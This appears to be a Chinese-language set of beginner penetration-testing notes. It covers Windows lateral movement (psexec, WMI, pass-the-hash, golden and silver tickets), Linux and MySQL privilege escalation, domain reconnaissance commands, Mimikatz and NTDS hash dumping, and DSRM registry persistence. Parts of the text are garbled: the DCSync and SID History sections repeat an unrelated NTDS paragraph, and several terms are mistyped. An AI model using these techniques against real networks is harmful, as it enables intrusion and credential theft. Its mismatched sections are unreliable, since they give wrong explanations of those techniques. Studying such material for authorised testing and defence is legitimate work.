1. 邊緣主機出網，選擇reverse反向連接，現在已經上線邊緣主機

2. 過已有的父Beacon使用SMB協(xié)議進行正向連接不出網機器，要求目標開啟445端口，通過命名管道

進行認證即可上線，用戶名和hash后，即可執(zhí)行遠程命令

橫向移動

利用windows遠程連接命令

IPC連接

（1）目標機器沒有禁用IPC$連接，沒有什么防火防盜攔截IPC$，139 445 端口也開了（能走445走

445，不能則走139）

（2）目標機器小管理員開了IPC$默認共享服務

（3）獲取了目標機器的小管理員的管理員權限的賬號密碼（最好是域管理員賬號密碼），明文的

（4）目標系統(tǒng)能支持IPC$，且和攻擊機能彼此互通（廢話）

at任務

一是在獲取webshell后不能夠執(zhí)行系統(tǒng)命令的情況下可以用at命令將命令執(zhí)行后寫入txt再用type讀取，

二是利用at計劃任務命令上線cs或者msf

首先介紹第一個用處，這是我之前在實戰(zhàn)的過程中拿到了一個oa系統(tǒng)的shell，但是這里在webshell處不

能夠執(zhí)行命令，這時候就可以調用at命令調用cmd執(zhí)行系統(tǒng)命令

schtasks命令

在2008及以后的系統(tǒng)中已經將at命令廢棄，改用schtasks命令代替了at命令，原因是因為schtasks命令

比at命令使用起來更加靈活。

psexec

基本原理：

通過ipc連接admin，釋放二進制文件psexecsvc.exe到目標.通過服務管理SCManager遠程創(chuàng)建一個psexec服務，并啟動服務.客戶端連接執(zhí)行命令，服務端通過服務啟動相應的程序執(zhí)行命令并回顯數據.運行結束后刪除服務

使用前提：

對方主機開啟了 admin共享，如果關閉了admin共享，會提示：找不到網絡名對方未開啟防火墻如果是工作組環(huán)境，則必須使用administrator用戶連接（因為要在目標主機上面創(chuàng)建并啟動服務），使用其他賬號(包括管理員組中的非administrator用戶)登錄都會提示訪問拒絕訪問。如果是域環(huán)境，即可用普通域用戶連接也可以用域管理員用戶連接。連接普通域主機可以用普通域用戶，連接域控只能用域管理員賬戶。

利用WMI

Windows操作系統(tǒng)默認不會將wmi操作記錄到日志當中，而且因為采用的是無文件攻擊，所以導致WMI具有極高的隱蔽性，wmic也可以用來調用cmd執(zhí)行系統(tǒng)命令，跟at命令類似，wmic調用cmd的時候也是沒有回顯的，所以我們還是寫入txt用type命令進行查看

PTH(pass the hash)

1.獲得一臺域主機的權限

2.Dump內存獲得用戶hash

3.通過pass the hash嘗試登錄其他主機

4.繼續(xù)搜集hash并嘗試遠程登錄

5.直到獲得域管理員賬戶hash，登錄域控，最終成功控制整個域

防御：KB2871997后，發(fā)現無法使用常規(guī)的哈希傳遞方法進行橫向移動，但Administrator賬號

(SID為500)例外-----使用該賬號的散列值依然可以進行哈希傳遞。這里強調的是SID為500的賬號，

在一些計算機中，即使將Administator賬號改名，也不會影響SID的值。所以，如果攻擊者使用SID

為500的賬號進行橫向移動，就不會受到KB2871997的影響

PTT(pass the ticket)

黃金票據和白銀票據的區(qū)別：黃金票據與KDC通信，黃金票據是偽裝kerberos認證的第一階段的TGT,而

白銀票據在 kerberos 認證的第三步 Ticket 中組成

黃金票據偽造

條件

1. 完整的域名稱

2. krbtgt 賬戶的 NTLM Hash 或者 AES-256

3. 域的 sid

4. 需要偽造的域管理員用戶名

白銀票據偽造

條件

1. 域名

2. 域 SID

3. 目標服務器的 FQDN

4. 可利用的服務

5. 服務賬號的 NTLM Hash

6. 需要偽造的用戶名

提權

linux

內核提權

老版的臟牛和前幾天的pcexec

SUID提權

SUID是一種特殊權限，可以讓調用者在執(zhí)行過程中暫時獲得該文件擁有者的權限。如果可以找到并運行

root用戶所擁有的SUID的文件，那么就可以在運行該文件的時候獲得root用戶權限

find / -perm -u=s -type f 2>/dev/null

SUDO提權

普通用戶在使用sudo執(zhí)行命令的過程中，會以root方式執(zhí)行命令。在很多場景里，管理員為了運維管理

方便，sudoer配置文件錯誤導致提權。

計劃任務

如果可以找到可以有權限修改的計劃任務腳本，就可以修改腳本實現提權。本質上，就是文件權限配置

不當。

ls -l /etc/cron*

more /etc/crontab

MySQL提權

udf提權

udf = 'user defined function'，即‘用戶自定義函數’。是通過添加新函數，對MYSQL的功能進行擴充，

性質就象使用本地MYSQL函數如abs()或concat()。 通過udf創(chuàng)建能夠執(zhí)行系統(tǒng)命令的函數sys_exec、

sys_eval，使得入侵者能夠獲得一般情況下無法獲得的shell執(zhí)行權限。

mof提權

"托管對象格式"其作用是每隔五秒就會去監(jiān)控進程創(chuàng)建和死亡。其就是用又了mysql的root權限了以后，

然后使用root權限去執(zhí)行我們上傳的mof。隔了一定時間以后這個mof就會被執(zhí)行，這個mof當中有一段

是vbs腳本，這個vbs大多數的是cmd的添加管理員用戶的命令。

windows

內核漏洞

systeminfo

或

wmic qfe get caption,description,hotfixid,installedon

KiTrap0D和KB979682對應、MS10-021和KB979683對應

計劃任務提權

如果我們對以高權限運行的任務所在目錄具有寫入權限，就可以使用惡意程序覆蓋掉原來的程序。當計

劃任務下次執(zhí)行時，就會以高權限運行惡意程序，進而完成提權。

內網信息收集

查詢域

net view /domain

查詢所有域成員計算機列表

net group "domain computers" /domain

獲取域管理員列表

net group "Domain Admins" /domain

列出本機所有進程及進程用戶

Tasklist /v

集群域和工作組的區(qū)別

工作組

是局域網中的一個概念，它是最常見的資源管理模式，簡單是因為默認情況下計算機都是采用工作組方

式進行資源管理的。將不同的電腦按功能分別列入不同的組中，以方便管理。默認情況下所有計算機都

處在名為 WORKGROUP 的工作組中，工作組資源管理模式適合于網絡中計算機不多，對管理要求不嚴

格的情況。

域

域 (Domain)是一個有安全邊界的計算機集合（ 安全邊界，意思是在兩個域中，一個域中的用戶無法訪

問另一個域中的資源）。它有一個更加嚴格的安全管理控制機制，如果你想訪問域內的資源，就必須擁

有一個合法的身份登陸到該域中,而你對該域內的資源擁有什么樣的權限,還需要取決于你在該域中的用戶

身份。

集群

“群集”是一組協(xié)同工作并運行Microsoft群集服務的獨立服務器。允許客戶端在出現故障和計劃中的暫停

時依然能夠訪問應用程序和資源，如果群集中的某臺服務器由于故障或維護需要而無法使用時，資源和

應用程序將轉移到可用的群集節(jié)點上。

linux基礎命令

檢測內核版本

# 查看系統(tǒng)發(fā)行版本

lsb_release -a

# 查看內核版本

uname -a

root 的歷史命令

history

/home各帳號目錄下的.bash_history，查看普通帳號的歷史命令

檢查異常端口、進程

1.使用netstat 網絡連接命令，分析可疑端口、IP、PID

2.netstat -antlp|more

3.查看下pid所對應的進程文件路徑，運行l(wèi)s -l /proc/$PID/exe或file /proc/$PID/exe（$PID 為對應

的pid 號），查看啟動命令ps –ef |grep $PID（效果同 ps aux |grep $PID）

4.查看端口是否開啟：lsof -i:端口號 或者netstat -atu檢查linux中的開放端口

dunp hash

有域控怎么dunp hash

Mimikatz

Mimikatz有一個功能（dcsync），它利用目錄復制服務（DRS）從NTDS.DIT文件中檢索密碼哈希值。

這樣子解決了需要直接使用域控制器進行身份驗證的需要，因為它可以從域管理員的上下文中獲得執(zhí)行

權限。

NTDS

它是域控制器生態(tài)系統(tǒng)的一部分，其目的是為了使管理員能夠訪問和管理Windows Active Directory數

據庫。但是，滲透測試人員和redteam可以用它來拍攝現有ntds.dit文件的快照，該文件可以復制到新位

置以進行離線分析和密碼哈希的提取。

DCSync

該NTDSUTIL是一個命令行工具，它是域控制器生態(tài)系統(tǒng)的一部分，其目的是為了使管理員能夠訪問和

管理Windows Active Directory數據庫。但是，滲透測試人員和redteam可以用它來拍攝現有ntds.dit文

件的快照，該文件可以復制到新位置以進行離線分析和密碼哈希的提取。

權限維持

SID History

它是域控制器生態(tài)系統(tǒng)的一部分，其目的是為了使管理員能夠訪問和管理Windows Active Directory數

據庫。但是，滲透測試人員和redteam可以用它來拍攝現有ntds.dit文件的快照，該文件可以復制到新位

置以進行離線分析和密碼哈希的提取。

DSRM

域控上有個賬戶，名字為目錄服務還原模式賬戶又名DSRM賬戶，它的密碼是安裝DC的時候設置的，一

般不會修改。但是當DSRM賬戶被修改的時候，域控的本地管理員administrator賬戶密碼的hash也會被

修改，并且與DSRM賬戶的hash是一樣的。這時候即使再次修改了本地管理員administrator賬戶的明文

密碼，sam文件的hash也不會更改，只會更改ntds.dit文件中的hash。綜上，意味著只要我們能夠更改

DSRM的賬號密碼，我們就能夠通過DSRM的密碼的hash登陸域控主機，并且即使域控主機的本地管理

員密碼改變了，DSRM的hash也不會變，我們依舊可以利用pth攻擊來登陸。該攻擊需要使用域控上的

ntdsutil工具修改DSRM賬戶的密碼（保證自己知道的密碼），然后需要修改dsrm的登錄方式因為在

windows server 2000以后版本的操作系統(tǒng)中，對DSRM使用控制臺登錄域控制器進行了限制

在注冊表中新建HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior項。

DSRM的三種登錄方式：

0：默認值，只有當域控制器重啟并進入DSRM模式時，才可以使用DSRM管理員賬號。

1：只有當本地AD、DS服務停止時，才可以使用DSRM管理員賬號登錄域控制器。

2：在任何情況下，都可以使用DSRM管理員賬號登錄域控制器。

如果要使用DSRM賬號通過網絡登錄域控制器，需要將該值設置為2

委派攻擊

分別是非約束性委派、約束性委派和基于資源的約束性委派。

非約束性委派

在非約束性委派中，服務賬號可以獲取域用戶的 TGT，并使用該 TGT 模擬域用戶訪問任意服務。配置了

非約束性委派的賬戶的 userAccountControl 屬性會設置 TRUSTED_FOR_DELEGATION 標志位。下圖所

示為非約束性委派的完整請求過程。

約束性委派

微軟為 Kerberos 協(xié)議的 TGS_REQ 和 TGS_REP 階段引入了兩個擴展協(xié)議 S4u2self（Service for User

to Self）和 S4U2proxy（Service for User to Proxy）。

S4U2self 擴展允許服務代表用戶獲取針對自己的服務票據，S4U2proxy 允許服務代表用戶獲取另一個

服務的服務票據。約束委派就是限制了 S4U2proxy 擴展的請求范圍，使得配置了委派屬性的服務只能模

擬用戶身份訪問特定的其他服務。配置了約束性委派的賬戶的 userAccountControl 屬性會設置

TRUSTED_TO_AUTH_FOR_DELEGATION 標志位，并且賬戶的 msDS-AllowedToDelegateTo 屬性會被

設置為對哪些服務進行委派。下圖所示為約束性委派中，S4U2self 和 S4U2proxy 擴展的完整請求過

程。文章來源地址http://www.zghlxwxcb.cn/news/detail-622214.html

到了這里，關于入門必看——滲透測試基礎知識筆記的文章就介紹完了。如果您還想了解更多內容，請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章，希望大家以后多多支持TOY模板網！